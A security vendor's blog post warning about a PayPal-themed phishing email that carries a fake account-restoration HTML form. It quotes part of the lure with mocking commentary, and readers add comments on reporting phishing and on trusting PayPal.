Sophos Cloud Optix
Have you received an email, seemingly from PayPal, declaring that your account has been temporarily limited?
Plenty of people have been targeted by an attack which uses the subject line “Your account has been temporarily limited!” and claims to come from what appears to be an offiicial PayPal address.
Well, beware opening the attached reactivation form too quickly because you could be passing your personal information to cybercriminals.
Because the emails are bogus, and the headers are forged – all with the intention of stealing information from you.
Here is part of the text of that we are seeing being spammed out widely right now:
Dear PayPal account holder,
PayPal is constantly working to ensure security by regularly screening the accounts in our system. We have recently determined that different computers have tried logging into your PayPal account,and multiple password failures were present before the logons.
Sounds scary, eh? People on different computers have been trying to log into your PayPal account, and have been guessing at the passwords? Nasty!
Until we can collect secure information, your access to sensitive account features will be limited. We would like to restore your access as soon as possible, and we apologize for the inconvenience.
Those nice folks at PayPal are looking out for you! They’ve locked down the account because of all the attempted intrusions. Thank goodness!
Download and fill out the form to resolve the problem and then log into your account.
And sure enough, there is a form attached to the email. It’s called Restore_your_account_PayPal.html
But these emails and the form don’t really come from PayPal, and entering your confidential information into the form is only going to pass your private data to the cybercriminals behind this spam campaign who will use it to phish your account for money and perhaps steal your identity.
Sophos customers are proactively protected against this attack. You may not have fallen for it (the lack of graphics in the email body make it look less convincing than some of the PayPal phishing scams we often see) but you may have other loved ones and acquaintances who would be vulnerable to an attack like this.
If I am ever in doubt about an email I go to the company’s website and sign into my account and talk to them directly.
I have clients who really need this type of protection — but your blog articles isn't pointing to anywhere on your site where my clients can also be: "Sophos customers are proactively protected against this attack". I cannot tell you the number of folks I have helped who kind of knew they shouldn't have responded to this type of attack, but did anyway. I think that even where there is a lot of education about these types of attack, many do not feel empowered to ignore messages or are more afraid of missing something important. Thanks for the fine review of this type of scam.
Thanks for the feedback. Sophos's email protection solutions are described here: http://www.sophos.com/products/enterprise/email/
I do not know why people use Paypal. Is insecure, is run by people with no scruples.
How any company that presents to be a bank will block your account? Paypal is not a bank, and never will be one! Do not trust such company, a wolf dress as a lam.
Paypal is perfectly safe if used properly. Giving away insecure information under insecure circumstances will render anyone vulnerable. Scaremongering about 'wolves' and ' lam(s) sic might well display your own paranoia but helps no-one.
Caution and common sense are required in the real world AND on the internet.
I received a grateful email from PayPal when I forwarded such a phish to spoof@paypal.com. I think it is important for companies to know when their name is being used for fraudulent purposes. I can tell most of these are fraudulent because I don't even have accounts with the companies that are supposedly warning me about my accounts.
You can report PayPal spam and phishing by forwarding it to PayPal: spoof@paypal.com. Most companies have an address where you can forward to them suspected phishing. I never open any attachments unless a friend calls and tells me it's on its way and never open fw. jokes or funnies even from friends. It's easy to be safe if you're cautious!
genuine emails from Paypal always address the recipient by their name…
On a related note…I received several phone calls from what the Caller ID said was PayPal/E-Bay last week. I have no outstanding accounts with E-Bay and my PayPal balance is zero. Be aware!